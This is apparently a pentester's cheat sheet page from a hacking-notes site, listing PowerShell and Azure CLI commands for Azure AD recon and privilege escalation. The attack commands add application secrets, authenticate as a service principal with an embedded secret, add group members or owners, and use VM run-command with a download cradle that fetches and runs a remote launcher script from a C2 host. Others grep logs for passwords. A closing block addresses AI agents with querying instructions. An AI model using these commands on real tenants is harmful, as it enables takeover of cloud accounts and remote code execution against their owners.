# AzureCli - PowerShell {% embed url="" %} ### Connect: ```powershell connect-azuread ``` ### Recon: Get Ad User: ``` Get-AzureAdUser Get-AzureAdUser | ?{$_.DisplayName -eq 'Administrator'} ``` Get AD Directory Role: ``` Get-AzureADDirectoryRole Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Global Administrator'} | select DisplayName, ObjectId,RoleTemplateId ``` Get AD Directory Role Member (based off above ObjectId): ``` Get-AzureADDirectoryRoleMember Get-AzureADDirectoryRoleMember -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101" ``` Get AD Group: ``` Get-AzureADGroup Get-AzureADGroup -ObjectId "ObjectID" ``` Get AD Group member: ``` Get-AzureADGroupMember -ObjectId d2b8110d-900f-4a37-92f0-b9c541ee4440 ``` Get AD Applications: ``` Get-AzureADApplication Get-AzureADApplication -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101" ``` Get AD Application Owner: ``` Get-AzureADApplicationOwner -ObjectId "74897263-fd31-48b8-8370-9fb8a847e9ef" ``` ## PrivEsc: ### Applications & Service Principle exploitation Add Application Secret: ```powershell # best to use PowerZure here Add-AzureADSPSecret -ApplicationName APPLICATION -Verbose ``` Authenticate as Service principle: ```powershell $ApplicationId = "2097243e-269f-47-8d-f9c62ecc8b5c" $SecurePassword = "Z1Y~TjWzaZw" $SecurePassword = ConvertTo-SecureString -String $SecurePassword -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $ApplicationId, $SecurePassword Connect-AzAccount -Credential $Credential -Tenant b20fc61c-960d-4f40-bbbe-17ac412fe0c0 -ServicePrincipal ``` #### AZAddMembers add target to group: ```powershell Add-AzureADGroupMember -ObjectId GROUP-ID -RefObjectId USER-ID ``` #### AzureADGroupOwner ```powershell Add-AzureADGroupOwner -ObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0 -RefObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0 ``` ### ### Virtual Machine: List VMs: ``` (az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)} ``` Run command: 
az vm run-command invoke --command-id RunPowerShellScript --name -g --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"
az vm run-command invoke
az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
#### Privesc: ``` (az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)} ``` ## Azure shell: #### history enumeration: ``` grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://f1rstbyt3.gitbook.io/hacking-notes/cloud-1/azure/tools/azurecli-powershell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.